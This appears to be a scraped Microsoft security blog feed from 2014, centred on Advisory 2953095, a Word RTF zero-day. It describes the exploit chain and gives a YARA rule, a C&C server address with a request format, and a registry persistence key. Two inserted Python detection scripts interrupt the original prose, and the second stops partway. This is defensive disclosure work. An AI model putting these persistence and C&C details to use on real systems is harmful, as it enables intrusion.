But when seen together, the correlation (in this example at least) is pretty easy to spot.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/CME3.png"><img style="width:500px;height:233px;" alt="Coordinated Malware Eradication" src="http://www.microsoft.com/security/portal/blog-images/a/CME3.png" border="0" /></a></p> <p><em>Figure 2: Putting machine learning against massively correlated signals means we can go on the offensive</em></p> <p>Putting machine learning to use at these huge scales against massively correlated signals means we can go on the offensive. Hopefully it will leave the bad guys with nowhere to go. It will allow us, as an industry, to blunt the efforts of the malware authors and their supply chains, and to block their attempts to game and steal from our customers.</p> <p>I encourage you to join the conversation. We will be holding roundtable discussions at a few more upcoming events. The latest schedule is below. If you would like to attend a discussion, email us at <a href="mailto:cme-invite@microsoft.com">cme-invite@microsoft.com</a>.</p> <p><em>Dennis Batchelder</em><br /><em>Partner PM Manager</em><br /><em>MMPC</em></p> <h3>Upcoming roundtable discussions:</h3> <div> <ul> <li><strong>PC Security Labs Conference 2014</strong>, April 1, 2014 &ndash; April 2, 2014, Beijing, China</li> <li><strong>CARO Workshop</strong>, May 15, 2014 &ndash; May 16, 2014, Melbourne, FL</li> <li><strong>26th Annual FIRST Conference</strong>, June 22, 2014 &ndash; June 27, 2014, Boston, MA</li> <li><strong>Microsoft Security Research Alliance Summit</strong><br />July 22, 2014 &ndash; July 24, 2014, Seattle, WA<br /><em>Invite only. NDA required.</em></li> </ul> </div> </div>
<p><strong>Reflecting on Updated Privacy Practices</strong><br />http://blogs.technet.com/b/trustworthycomputing/archive/2014/03/29/reflecting-on-updated-privacy-practices.aspx<br />Sat, 29 Mar 2014 17:07:36 GMT, Trusted Cloud Team</p>
<p><strong>By Brendon Lynch, Chief Privacy Officer</strong></p> <p>For more than a decade, Microsoft has invested in a comprehensive privacy program that sets the foundation for our efforts to responsibly manage our customers&rsquo; data. An important part of our privacy commitment is that we evolve our policies and practices to address changes in technology and customer expectations. 
Earlier today, <a href="/b/microsoft_on_the_issues/archive/2014/03/28/we-re-listening-additional-steps-to-protect-your-privacy.aspx">Microsoft General Counsel Brad Smith announced</a> a change to Microsoft&rsquo;s privacy practices to further enhance our privacy commitments. <a href="/b/trustworthycomputing/archive/2014/03/29/reflecting-on-updated-privacy-practices.aspx" target="_blank">Read more &gt;&gt;</a></p>
<p><strong>Security Advisory 2953095: recommendation to stay protected and for detections</strong><br />http://blogs.technet.com/b/srd/archive/2014/03/24/security-advisory-2953095-recommendation-to-stay-protected-and-for-detections.aspx<br />Mon, 24 Mar 2014 19:01:24 GMT, swiat</p>
<p>Today, Microsoft released <a href="http://technet.microsoft.com/en-us/security/advisory/2953095">Security Advisory 2953095</a> to notify customers of a vulnerability in Microsoft Word. At this time, we are aware of limited, targeted attacks directed at Microsoft Word 2010.</p> <p>This blog discusses mitigations and temporary defensive strategies that will help customers protect themselves while we are working on a security update. This blog also provides some preliminary details of the exploit code observed in the wild.</p> <p><b>Mitigations and Workaround</b></p> <p>The in-the-wild exploit takes advantage of an unspecified RTF parsing vulnerability combined with an ASLR bypass, which depends on a module loaded at a predictable memory address.</p> <p>First, our tests showed that EMET&rsquo;s default configuration can block the exploits seen in the wild. In this case, EMET&rsquo;s mitigations such as &ldquo;Mandatory ASLR&rdquo; and the anti-ROP features effectively stop the exploit. You can find more information about EMET at <a href="http://www.microsoft.com/emet">http://www.microsoft.com/emet</a>. The exploit code seems to target Word 2010, and it relies heavily on the specific ASLR bypass mentioned above. We were glad to see in our tests that this exploit fails (resulting in a crash) on machines running Word 2013, due to the <a href="http://blogs.technet.com/b/srd/archive/2014/03/12/when-aslr-makes-the-difference.aspx">ASLR enforcement introduced for this product</a>.</p> <p>In addition to the EMET mitigations, users may consider applying stronger protections by blocking the root cause of the issue with one of the following suggested workarounds:</p> <ul> <li> <p>disable opening of RTF files;</p> </li> <li> <p>force Word to always open RTF files in <em>Protected View</em> via the Trust Center settings.</p> </li> </ul> <p>To facilitate deployment of the first workaround, we are providing a <a href="https://support.microsoft.com/kb/2953095">Fix it automated tool</a>. The Fix it uses Office&rsquo;s file block feature and adds a few registry keys to prevent opening of RTF files in all Word versions. 
After the Fix it is installed, opening an RTF file will result in the following message:</p> <p><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/3124.pic1.png"><img style="margin-right:auto;margin-left:auto;display:block;" alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/3124.pic1.png" border="0" /></a></p> <p style="text-align:justify;">If blocking RTF files is not an option, enterprises could enforce &ldquo;<em>Open selected file types in Protected View</em>&rdquo; instead of &ldquo;<em>Do not open selected file types</em>&rdquo; in the Trust Center settings. The &ldquo;Protected View&rdquo; mode in Office 2010/2013 does not allow ActiveX controls to load, which mitigates the attack we observed. Once the workaround is enabled, Word will show the <em>Protected View</em> gold bar, but will still allow a preview of the document.</p> <p><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/0118.pic2.png"><img style="margin-right:auto;margin-left:auto;display:block;" alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/0118.pic2.png" border="0" /></a></p> <p style="text-align:justify;">Enterprise admins may also consider building their own custom protection using the Trust Center features of Office instead of the Fix it, since these settings can be managed and deployed through GPO. 
For more details, please refer to <a href="http://office.microsoft.com/en-us/word-help/what-is-file-block-HA010355927.aspx#_File_Block_settings">http://office.microsoft.com/en-us/word-help/what-is-file-block-HA010355927.aspx#_File_Block_settings</a>.</p> <p><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/1212.pic3.png"><img style="margin-right:auto;margin-left:auto;display:block;" alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/1212.pic3.png" border="0" /></a></p> <p style="text-align:justify;"><b>Theoretical Outlook attack vector</b></p> <p style="text-align:justify;">There is a theoretical Outlook attack vector for RTF vulnerabilities through the preview pane. The reduced functionality of the preview pane makes this attack vector extremely hard to carry out, and to date we have never seen exploits leveraging this mechanism.</p> <p style="text-align:justify;"><b>Technical details of the exploit</b></p> <p style="text-align:justify;">The attack detected in the wild is limited and very targeted in nature. The malicious document is designed to trigger a memory corruption vulnerability in the RTF parsing code. The attacker embedded a secondary component in order to bypass ASLR, and leveraged return-oriented programming techniques using native RTF encoding schemes to craft ROP gadgets. 
The structure of the malicious document and its individual blocks is described in the picture below.</p> <p><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/pic4.png"><img width="439" height="312" style="border:1px solid currentColor;width:435px;height:331px;margin-right:auto;margin-left:auto;display:block;" alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/pic4.png" /></a></p> <p>When the memory corruption vulnerability is triggered, the exploit gains initial code execution and, in order to bypass DEP and ASLR, executes a ROP chain that allocates a large chunk of executable memory and transfers control to the first piece of the shellcode (an egghunter). This code then searches for the main shellcode placed at the end of the RTF document and executes it.</p> <p align="center"><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/pic5.png"><img style="border:1px solid currentColor;margin-right:auto;margin-left:auto;display:block;" alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/pic5.png" /></a></p> <p style="text-align:justify;">One peculiar aspect of the main shellcode is that it employs multiple consecutive layers of decryption and well-known anti-debugging tricks, such as tests of debugging flags, RDTSC timing checks and jump-hops over hooks, possibly to defeat automated sandboxes, analysis tools and researchers. The shellcode has also been programmed with a special date-based deactivation logic. 
In fact, it parses the content of the &ldquo;<i>C:\Windows\SoftwareDistribution\ReportingEvents.log</i>&rdquo; file and scans all the Microsoft updates installed on the machine. The shellcode will not perform any additional malicious action if there are updates installed after April 8, 2014. This means that even after a successful exploitation with reliable code execution, after this date the shellcode may decide not to drop the secondary backdoor payload and simply abort execution. When the activation logic detects the right condition to trigger, the exploit drops a backdoor file named &lsquo;svchost.exe&rsquo; in the temporary folder and runs it. The dropped backdoor is generic malware written in Visual Basic 6 which communicates over HTTPS, relies on the execution of multiple Windows scripts via WScript.Shell, and can install/run additional MSI components.</p> <p style="text-align:justify;"><b>Detection and indicators for defenders</b></p> <p style="text-align:justify;">We are providing a list of IOCs (Indicators of Compromise) to facilitate defensive efforts and to help security vendors and professionals stay protected from this specific attack. 
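As an added example (not part of the original advisory), the following Python script applies the same triage logic as the SA2953095_RTF YARA rule listed in the IoC table below: the four byte patterns, the exclusive 100KB to 500KB size window, and the requirement of more than eight <code>?\u-554</code> occurrences. The RTF blob it checks is constructed inline and inert; <code>triage_rtf</code>, <code>triage_file</code> and <code>build_sample</code> are names chosen here.

```python
"""RTF triage with the same logic as the SA2953095_RTF YARA rule (added example, not MSRC code)."""
from dataclasses import dataclass
from pathlib import Path

# Byte patterns taken from the advisory's YARA rule (YARA's "\\" is one backslash on disk).
BAD_HDR = b"{\\rt{"          # malformed "{\rt{" header seen in the malicious sample
OCX_TAG = b"\\objocx\\"      # embedded OCX object (the ASLR-bypass component)
MSCOMCTL = b"MSComctlLib."   # the control that is loaded at a predictable address
ROP = b"?\\u-554"            # RTF \u escape used to encode ROP gadget bytes

# YARA's KB multiplier is 1024; the rule uses an exclusive window (> 100KB and < 500KB).
MIN_SIZE = 100 * 1024
MAX_SIZE = 500 * 1024
ROP_MIN_COUNT = 8            # condition "#rop > 8"


@dataclass
class RtfTriage:
    """Per-file evaluation of each term of the YARA condition."""
    size: int
    has_bad_hdr: bool
    has_ocx_tag: bool
    has_mscomctl: bool
    rop_count: int

    @property
    def matches(self) -> bool:
        return (MIN_SIZE < self.size < MAX_SIZE
                and self.has_bad_hdr and self.has_ocx_tag and self.has_mscomctl
                and self.rop_count > ROP_MIN_COUNT)


def triage_rtf(data: bytes) -> RtfTriage:
    """Evaluate the rule's terms on raw file bytes.

    This is plain substring matching, exactly as YARA does it: the rule is tied to how this
    specific sample was written, and RTF control words in other samples may be cased or
    encoded differently, so a non-match is not a clean bill of health.
    """
    return RtfTriage(
        size=len(data),
        has_bad_hdr=BAD_HDR in data,
        has_ocx_tag=OCX_TAG in data,
        has_mscomctl=MSCOMCTL in data,
        rop_count=data.count(ROP),   # non-overlapping count, same as YARA's #rop
    )


def triage_file(path: str) -> RtfTriage:
    """Convenience wrapper for a file on disk."""
    return triage_rtf(Path(path).read_bytes())


def build_sample(rop_repeats: int, total_size: int) -> bytes:
    """Constructed, inert RTF-like blob carrying the rule's markers (no exploit content)."""
    body = (BAD_HDR + b"\\ansi "
            + b"{\\object\\objocx\\objdata " + MSCOMCTL + b"ListViewCtrl.2 "
            + b"{\\uc1 " + ROP * rop_repeats + b"}}")
    padding = b"\\par " * ((total_size - len(body) - 1) // 5)   # filler that matches nothing
    blob = body + padding
    return blob + b" " * (total_size - len(blob) - 1) + b"}"      # pad to exactly total_size


if __name__ == "__main__":
    for label, blob in [
        ("benign", b"{\\rtf1\\ansi Hello, world.}"),
        ("markers, too small", build_sample(9, 50 * 1024)),
        ("markers, 8 rop", build_sample(8, 200 * 1024)),
        ("markers, 9 rop", build_sample(9, 200 * 1024)),
    ]:
        t = triage_rtf(blob)
        print(f"{label:20s} size={t.size:7d} rop={t.rop_count:2d} match={t.matches}")
```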
The remote C&amp;C server used by the current backdoor communicates over encrypted SSL traffic with a static self-signed certificate that can be easily detected.</p> <table style="margin-right:auto;margin-left:auto;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td width="168" valign="top"> <p><b>&nbsp;YARA RULE (RTF)</b></p> </td> <td width="456" valign="top"> <p>rule SA2953095_RTF<br />{<br />&nbsp;&nbsp; meta:<br />&nbsp;&nbsp;&nbsp;&nbsp; description = &quot;MS Security Advisory 2953095&quot;</p> <p>&nbsp;&nbsp; strings:<br />&nbsp;&nbsp;&nbsp; $badHdr&nbsp;&nbsp; = &quot;{\\rt{&quot;<br />&nbsp;&nbsp;&nbsp; $ocxTag&nbsp;&nbsp; = &quot;\\objocx\\&quot;<br />&nbsp;&nbsp;&nbsp; $mscomctl = &quot;MSComctlLib.&quot;<br />&nbsp;&nbsp;&nbsp; $rop&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; = &quot;?\\u-554&quot;</p> <p>&nbsp;&nbsp; condition:<br />&nbsp;&nbsp;&nbsp; filesize &gt; 100KB and filesize &lt; 500KB<br />&nbsp;&nbsp;&nbsp; and $badHdr and $ocxTag and $mscomctl and #rop&gt;8<br />}</p> </td> </tr> <tr> <td width="168" valign="top"> <p><b>&nbsp;SAMPLE HASHES</b></p> </td> <td width="456" valign="top"> <p>Filename: %TEMP%\svchost.exe</p> <p>MD5: af63f1dc3bb37e54209139bd7a3680b1<br />SHA1: 77ec5d22e64c17473290fb05ec5125b7a7e02828</p> </td> </tr> <tr> <td width="168" valign="top"> <p><b>&nbsp;C&amp;C SERVER AND&nbsp;<br /></b><b>&nbsp;PROTOCOL</b></p> </td> <td width="456" valign="top"> <p>C&amp;C Server: <br /> h**ps://185.12.44.51 Port: 443</p> <p><i>NOTE: on port 80 the C&amp;C host serves a webpage mimicking the content of the &ldquo;http://www.latamcl.com/&rdquo; website</i></p> <p>GET request example:<br />h**ps://185.12.44.51/[random_alpha_chars].[3chars]?[encodedpayload]</p> <p>User-Agent string:<br />&ldquo;Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64;2*Uuhgco}%7)1&rdquo;</p> </td> </tr> <tr> <td width="168" valign="top"> <p><b>&nbsp;C&amp;C SSL CERTIFICATE<br /></b><b>&nbsp;(self-signed)</b></p> </td> <td width="456" valign="top"> <p>Issuer:<br />&nbsp;&nbsp;&nbsp; CN=*<br />&nbsp;&nbsp;&nbsp; O=My Company Ltd<br />&nbsp;&nbsp;&nbsp; S=Berkshire<br />&nbsp;&nbsp;&nbsp; C=NW<br />&nbsp;NotBefore: 1/1/2013 3:33 AM<br />&nbsp;NotAfter: 1/1/2014 3:33 AM</p> <p>Public Key Length: 1024 bits<br />Public Key: UnusedBits = 0</p> <p>
</p> <p>Cert Hash(md5): f0 82 aa f8 16 0e 83 8c 20 d7 95 f0 9d d2 01 57<br />Cert Hash(sha1): df 72 40 fb 9b cd 53 12 eb a5 f9 c2 dd e7 a2 9a 1d c8 f3 55</p> </td> </tr> <tr> <td width="168" valign="top"> <p><b>&nbsp;CRASH INDICATORS</b></p> </td> <td width="456" valign="top"> <p>Faulting application name: WINWORD.EXE,<br />version: 14.0.7113.5001, time stamp: 0x52866c04<br />Faulting module name: unknown,<br />version: 0.0.0.0, time stamp: 0x00000000<br />Exception code: 0xc0000005<br />Fault offset: 0x40002???<br />Faulting process id: n/a<br />Faulting application start time: n/a<br />Faulting application path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE<br />Faulting module path: unknown<span style="font-family:Times New
Roman;font-size:medium;"><br /></span></p> </td> </tr> <tr> <td width="168" valign="top"> <p><b>&nbsp;REGISTRY INDICATORS</b></p> </td> <td width="456" valign="top"> <p>Registry key added:<br />HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\Windows Startup Helper=&ldquo;%windir%\system32\wscript.exe %TEMP%\[malicious.vbs]&rdquo;</p> <p>Service name (possibly) created:<br />&ldquo;WindowsNetHelper&rdquo;</p> </td> </tr> </tbody> </table> <p><span style="font-size:medium;">- Chengyun Chu and Elia Florio, MSRC Engineering</span></p><div style="clear:both;"></div>
Tags: CVE-2014-1761, 0day, MSRC, 2953095, EMET, RTF
Microsoft Releases Security Advisory 2953095 http://blogs.technet.com/b/msrc/archive/2014/03/24/microsoft-releases-security-advisory-2953095.aspx Mon, 24 Mar 2014 18:00:29 GMT Dustin C. Childs <p>Today we released <a href="http://technet.microsoft.com/en-us/security/advisory/2953095">Security Advisory 2953095</a> to notify customers of a vulnerability in Microsoft Word. At this time, we are aware of limited, targeted attacks directed at Microsoft Word 2010. 
An attacker could cause remote code execution if someone was convinced to open a specially crafted Rich Text Format (RTF) file or a specially crafted mail in Microsoft Outlook while using Microsoft Word as the email viewer.</p> <p>As part of the security advisory, we have included an easy, one-click <a href="https://support.microsoft.com/kb/2953095">Fix it</a> to address the known attack vectors. The Fix it is available to all customers and helps prevent known attacks that leverage the vulnerability to execute code. Additionally, applying the Fix it does not require a reboot. We encourage all customers using Microsoft Word to apply this Fix it to help protect their systems.</p> <p>The <a href="http://technet.microsoft.com/en-us/security/jj653751">Enhanced Mitigation Experience Toolkit (EMET)</a> also helps to defend against this vulnerability when configured to work with Microsoft Office software. If you are using EMET 4.1 with the recommended settings, this configuration is already enabled and no additional steps are required.</p> <p>We also encourage you to follow the &quot;Protect Your Computer&quot; guidance of enabling a firewall, applying all software updates and installing anti-virus and anti-spyware software. In addition, we encourage everyone to exercise caution when visiting websites, and to avoid clicking suspicious links or opening email messages from unfamiliar senders. More information can be found at <a href="http://www.microsoft.com/protect">www.microsoft.com/protect</a>.</p> <p>We continue to work on a security update to address this issue. 
We are monitoring the threat landscape very closely and will continue to take appropriate action to help protect our global customers.</p> <p>Thank you,<br /> <a title="Dustin Childs" href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs">Dustin Childs</a><br /> Group Manager, Response Communications<br /> Trustworthy Computing</p><div style="clear:both;"></div>
Tags: Advisory, Fix It, Security Advisory, Microsoft Office
March 2014 Security Bulletin Webcast and Q&amp;A http://blogs.technet.com/b/msrc/archive/2014/03/17/march-2014-security-bulletin-webcast-and-q-amp-a.aspx Mon, 17 Mar 2014 21:00:00 GMT Dustin C. Childs <p>Today we published the <a href="http://blogs.technet.com/b/msrc/p/march-2014-security-bulletin-q-a.aspx">March 2014 Security Bulletin Webcast Questions &amp; Answers page</a>.&nbsp;We answered eight questions in total, with the majority focusing on the updates for Windows (<a href="https://technet.microsoft.com/security/bulletin/ms14-016">MS14-016</a>) and Internet Explorer (<a href="https://technet.microsoft.com/security/bulletin/ms14-012">MS14-012</a>). One question that was not answered on air has been included on the Q&amp;A page.</p> <p>Here is the <a href="http://www.youtube.com/v/jYyh1AtW4m4">video replay</a>.</p> <p>We invite you to join us for the next scheduled webcast on Wednesday, April 9, 2014, at 11 a.m. 
PDT (UTC -7), when we will go into detail about the April bulletin release and answer your bulletin deployment questions live on the air.</p> <p>You can register to attend the webcast at the link below:</p> <p><b>Date: Wednesday, April 9, 2014<br /> Time: 11:00 a.m. PDT (UTC -7)<br /> Register: </b><a href="https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032572978&amp;Culture=en-US"><b>Attendee Registration</b></a></p> <p>I look forward to seeing you next month.</p> <p>Thanks,<br /> <a href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs">Dustin Childs</a><br /> Group Manager, Response Communications<br /> Microsoft Trustworthy Computing</p><div style="clear:both;"></div>
Tags: Microsoft Windows, Bulletin Webcast, Security Bulletin Webcast, Internet Explorer (IE)
When ASLR makes the difference http://blogs.technet.com/b/srd/archive/2014/03/12/when-aslr-makes-the-difference.aspx Wed, 12 Mar 2014 16:13:30 GMT swiat <p style="text-align:justify;"><span style="font-family:Calibri;font-size:medium;">We wrote <a href="http://blogs.technet.com/b/srd/archive/2013/12/11/software-defense-mitigating-common-exploitation-techniques.aspx">several times</a> in this blog about the importance of enabling the <i>Address Space Layout Randomization</i> (ASLR) mitigation in modern software, because it is a very important defense mechanism that can increase the cost of writing exploits for attackers and in some cases prevent reliable exploitation. 
</span><span style="font-family:Calibri;font-size:medium;">In today&rsquo;s post, we&rsquo;ll go through ASLR one more time to show in practice how valuable it can be in mitigating two real exploits seen in the wild, and to suggest solutions for programs not yet equipped with ASLR.</span></p> <p style="text-align:justify;"><b><span style="font-family:Calibri;font-size:medium;">Born with ASLR</span></b></p> <p style="text-align:justify;"><span style="font-family:Calibri;"><span style="font-size:medium;">The ASLR mitigation adds a significant hurdle to exploit development, but we realized that sometimes a single module without ASLR loaded in a program can be enough to compromise all of its benefits at once. For this reason, recent versions of the most popular Microsoft programs were natively developed to enforce ASLR automatically for every module loaded into the process space. In fact, <span style="text-decoration:underline;">Internet Explorer 10/11 and Microsoft Office 2013</span> are designed to run with the full benefits of this mitigation and they <span style="text-decoration:underline;">enforce ASLR randomization natively without any additional setting on Win7 and above</span>, even for those DLLs not originally compiled with the /DYNAMICBASE flag. 
So, customers using these programs already have good native protection and only need to take care of other programs, potentially targeted by exploits, that do not use ASLR.</span></span></p> <p style="text-align:justify;"><b><span style="font-family:Calibri;font-size:medium;">ASLR effectiveness in action</span></b></p> <p style="text-align:justify;"><span style="font-family:Calibri;font-size:medium;">Given the importance of ASLR, we are making additional efforts to close gaps when ASLR bypasses surface at security conferences from time to time, or when they are found in the wild in targeted attacks. The goal of this effort is to strengthen protection also for previous versions of the Microsoft OS and browser that cannot enforce ASLR natively as IE 10/11 and Office 2013 do. Some examples of recent updates designed to break well-known ASLR bypasses are shown in the following table.</span></p> <div> <div> <table style="width:624px;height:182px;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td width="96" valign="top"> <p><b><span style="font-family:Calibri;font-size:medium;">MS BULLETIN</span></b></p> </td> <td width="192" valign="top"> <p><b><span style="font-family:Calibri;font-size:medium;">ASLR BYPASS</span></b></p> </td> <td width="342" valign="top"> <p><b><span style="font-family:Calibri;font-size:medium;">REFERENCE</span></b></p> </td> </tr> <tr> <td width="96" valign="top"> <p><a href="https://blogs.technet.com/b/srd/archive/2013/08/12/mitigating-the-ldrhotpatchroutine-dep-aslr-bypass-with-ms13-063.aspx"><span style="font-family:Calibri;font-size:medium;">MS13-063</span></a></p> </td> <td width="192" valign="top"> <p><span style="font-family:Calibri;font-size:medium;">LdrHotPatchRoutine</span></p> </td> <td width="342" valign="top"> <p><span style="font-family:Calibri;font-size:medium;">Ref: <a href="http://cansecwest.com/slides/2013/DEP-ASLR%20bypass%20without%20ROP-JIT.pdf">http://cansecwest.com/slides/2013/DEP-ASLR%20bypass%20without%20ROP-JIT.pdf</a></span></p> <p><span style="font-family:Calibri;font-size:medium;">Reported in Pwn2Own 2013, works only for Win7 x64</span></p> </td> </tr> <tr> <td width="96" valign="top"> <p><a href="https://blogs.technet.com/b/srd/archive/2013/12/09/ms13-106-another-aslr-bypass-is-gone.aspx"><span style="font-family:Calibri;font-size:medium;">MS13-106</span></a></p> </td> <td width="192" valign="top"> <p><span style="font-family:Calibri;font-size:medium;">HXDS.DLL (Office 2007/2010)</span></p> </td> <td width="342" valign="top"> <p><span style="font-family:Calibri;font-size:medium;">Ref: <a href="http://www.greyhathacker.net/?p=585">http://www.greyhathacker.net/?p=585</a></span></p> <p><span style="font-family:Calibri;font-size:medium;">Seen used in the wild with IE/Flash exploits <br />(CVE-2013-3893, CVE-2013-1347, <br />CVE-2012-4969, CVE-2012-4792)</span></p> </td> </tr> <tr> <td width="96" valign="top"> <p><a href="https://technet.microsoft.com/en-us/security/bulletin/ms14-009"><span style="font-family:Calibri;font-size:medium;">MS14-009</span></a></p> </td> <td width="192" valign="top"> <p><span style="font-family:Calibri;font-size:medium;">VSAVB7RT.DLL (.NET)</span></p> </td> <td width="342" valign="top"> <p><span style="font-family:Calibri;font-size:medium;">Ref: <a href="http://www.greyhathacker.net/?p=585">http://www.greyhathacker.net/?p=585</a></span></p> <p><span style="font-family:Calibri;font-size:medium;">Seen used in the wild with IE exploits <br />(CVE-2013-3893)</span></p> </td> </tr> </tbody> </table> </div> <div> <p style="text-align:justify;"><span style="font-family:Calibri;font-size:medium;">We were glad to see the return on these recent ASLR updates in two recent attacks: the Flash exploit <a href="http://www.fireeye.com/blog/technical/targeted-attack/2014/02/operation-greedywonk-multiple-economic-and-foreign-policy-sites-compromised-serving-up-flash-zero-day-exploit.html">found in February (CVE-2014-0502)</a> in some targeted attacks, and a privately reported bug in IE8 (CVE-2014-0324) patched just today. As shown in the code snippets below, the two exploits would not have been effective against fully patched machines with the MS13-106 update installed, running Vista or above.</span></p> <table style="width:630px;height:628px;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td width="362" valign="top"> <p><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/4786.pic1.png"><img width="520" height="506" style="width:360px;height:364px;" alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/4786.pic1.png" border="0" /></a></p> </td> <td width="261" valign="top"><span style="font-family:Times New
Roman;font-size:medium;"> </span> <p><b><span style="font-family:Calibri;font-size:medium;">Exploit code for CVE-2014-0502 (Flash)</span></b></p> <p><span style="font-family:Calibri;font-size:medium;">Unsuccessful attempt at an ASLR bypass using HXDS.DLL, fixed by MS13-106.</span></p> <p><span style="font-family:Calibri;font-size:medium;">NOTE: the code also attempts a second ASLR bypass based on Java 1.6.x</span></p> </td> </tr> <tr> <td width="362" valign="top"><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/3201.pic2.png"><img alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/3201.pic2.png" border="0" /></a></td> <td width="261" valign="top"> <p><b><span style="font-family:Calibri;font-size:medium;">Exploit code for CVE-2014-0324 (IE8)</span></b></p> <p><span style="font-family:Calibri;font-size:medium;">Unsuccessful attempt at an ASLR bypass using HXDS.DLL, fixed by MS13-106.</span></p> </td> </tr> </tbody> </table> <p style="text-align:justify;"><b><span style="font-family:Calibri;font-size:medium;">Solutions for&nbsp;non-ASLR modules</span></b></p> <p style="text-align:justify;"><span style="font-family:Calibri;"><span style="font-size:medium;">The two exploit code samples above show another important lesson: even if Microsoft libraries are compiled natively with ASLR, and even if we work hard to fix known ASLR gaps in our products, attackers can still use third-party DLLs to undermine the ASLR ecosystem. The example of Java 1.6.x is a well-known case: due to the popularity of this software suite, and to the fact that it loads an old non-ASLR library (MSVCR71.DLL) into the browser, it became a very popular vector used in exploits to bypass ASLR. 
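To make the /DYNAMICBASE point concrete, here is an added Python example (not code from this post) that reads a PE image's COFF and optional headers and reports whether the module opted into ASLR and still carries the relocations the loader needs to move it; <code>aslr_status</code>, <code>scan_dlls</code> and <code>build_minimal_pe</code> are names chosen here, and the header-only images used for the checks are constructed inline.

```python
"""Audit PE modules for the /DYNAMICBASE (ASLR) opt-in (added example, not code from the post)."""
import struct
from pathlib import Path
from typing import Dict, Iterator, Tuple

# Flags and layout from the PE/COFF specification.
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040   # set by the /DYNAMICBASE linker flag
IMAGE_FILE_RELOCS_STRIPPED = 0x0001               # no .reloc data: the image cannot be rebased
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
DLL_CHARACTERISTICS_OFFSET = 70                   # same offset in PE32 and PE32+ optional headers


def aslr_status(image: bytes) -> Dict[str, bool]:
    """Parse just enough of the headers to decide whether ASLR can apply to this module."""
    if image[:2] != b"MZ":
        raise ValueError("not a PE image: missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image: missing PE signature")
    coff = e_lfanew + 4
    # COFF header: SizeOfOptionalHeader at +16, Characteristics at +18.
    size_of_optional, file_characteristics = struct.unpack_from("<HH", image, coff + 16)
    optional = coff + 20
    if size_of_optional < DLL_CHARACTERISTICS_OFFSET + 2:
        raise ValueError("optional header too short to carry DllCharacteristics")
    (magic,) = struct.unpack_from("<H", image, optional)
    if magic not in (PE32_MAGIC, PE32PLUS_MAGIC):
        raise ValueError(f"unknown optional header magic 0x{magic:x}")
    (dll_characteristics,) = struct.unpack_from("<H", image, optional + DLL_CHARACTERISTICS_OFFSET)

    dynamic_base = bool(dll_characteristics & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)
    relocs_stripped = bool(file_characteristics & IMAGE_FILE_RELOCS_STRIPPED)
    return {
        "pe32plus": magic == PE32PLUS_MAGIC,
        "dynamic_base": dynamic_base,
        "relocs_stripped": relocs_stripped,
        # Opting in is not enough: without relocations the loader cannot move the image.
        "aslr_capable": dynamic_base and not relocs_stripped,
    }


def scan_dlls(directory: str) -> Iterator[Tuple[str, Dict[str, bool]]]:
    """Yield (path, status) for every *.dll under a directory; files that are not PE are skipped."""
    for path in Path(directory).rglob("*.dll"):
        with open(path, "rb") as fh:
            head = fh.read(4096)   # the headers sit at the start of the file; 4 KiB covers typical images
        try:
            yield str(path), aslr_status(head)
        except (ValueError, struct.error):
            continue


def build_minimal_pe(dll_characteristics: int, file_characteristics: int = 0x2102,
                     pe32plus: bool = False) -> bytes:
    """Constructed header-only image for tests: DOS header, PE signature, COFF + optional header.

    0x2102 = EXECUTABLE_IMAGE | 32BIT_MACHINE | DLL; OR in 0x0001 to mark relocations stripped.
    """
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)            # e_lfanew: PE header follows the DOS header
    optional_size = 112 if pe32plus else 96              # header sizes without data directories
    machine = 0x8664 if pe32plus else 0x14C
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, optional_size, file_characteristics)
    optional = bytearray(optional_size)
    struct.pack_into("<H", optional, 0, PE32PLUS_MAGIC if pe32plus else PE32_MAGIC)
    struct.pack_into("<H", optional, DLL_CHARACTERISTICS_OFFSET, dll_characteristics)
    return bytes(dos) + b"PE\0\0" + coff + bytes(optional)


if __name__ == "__main__":
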